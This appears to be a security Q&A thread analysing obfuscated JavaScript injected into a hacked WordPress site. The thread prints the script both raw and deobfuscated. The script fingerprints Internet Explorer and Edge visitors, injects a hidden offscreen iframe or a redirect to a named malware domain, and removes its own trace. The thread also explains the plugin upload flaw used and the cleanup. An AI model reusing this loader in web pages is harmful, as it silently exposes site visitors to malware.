if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;
                    left:-2630px;
                    \"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Which is still obfuscated a bit by using "random" variable name. Still you can see that the code is trying to redirect you to : 

hxxp://miwkavoriwka.ml/052F

Anyone know what this site is for?

schroeder
  • 123,438
  • 55
  • 284
  • 319
Gudradain
  • 6,921
  • 2
  • 26
  • 43
17

I deobfuscated the code a bit:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// POssible another mobile phone check ?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_edge_index = user_agent.indexOf("Edge/");
    if (user_agent_edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

It loads h**p://miwkavoriwka.ml/052F (which is already on some blacklists, inclusive FFs Phishing and Malware Protection list) in an iframe or redirect to that url (depending on your browser)

edit: After reading the code a bit: The only browser which seem to be targeted are the ones where this conditions are met:

  • Useragents containing MSIE, Trident/ or Edge/
  • No mobile phone ? (see function is_mobile_phone)
  • Some capability check true (see function some_capability_check)
Pierre.Vriens
  • 165
  • 1
  • 1
  • 11
SleepProgger
  • 590
  • 3
  • 10
  • 1
    I tried loading the site and it timeouted. Even when using some iphone User Agent. My best guess is they start a scan on connection, or just have the script disabled now. – SleepProgger Oct 15 '15 at 14:31
12

Thanks for all of the great info and help!

I have since discovered how the site was originally hacked. The site was running an old version of the plugin Mailpoet / wysija-newsletters (pre 2.6.7)

Using an exploit in this plugin the attacker managed to upload malicious code which was then used to further infect the site.

https://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

Ultimately the security issue with Mailpoet / wysija-newsletters was used to upload a file called .zip to /wp-content/uploads/wysija/temp and then extract the zip and install some dodgy themes. The attached screenshot shows what happened when going into the plugins admin page after the zip had been deleted. It seems that whenever going into wp-admin the site would get reinfected.

The site has now been restored from a clean version, fully patched and the plugin WordFence is running.

enter image description here

bf2mad
  • 401
  • 3
  • 9
6

It's apparent purpose is to infect wp-settings.php, so it infects all of your pages, and links malware through an iframe.

You can remove it by deleting wp_inc/upd.php, but this won't fix the threat vector unless that hole is plugged. However, the "main infection" itself may be located in a different file, if the comments are right. Again, removing this file will not help much if the threat vector is still there.

One person even suggested replacing eval with alert. Others have deobfuscated other versions already by using techniques described in this thread. Your code follows a very similar pattern to that one.

Community
  • 1
Mark Buffalo
  • 22,498
  • 8
  • 74
  • 91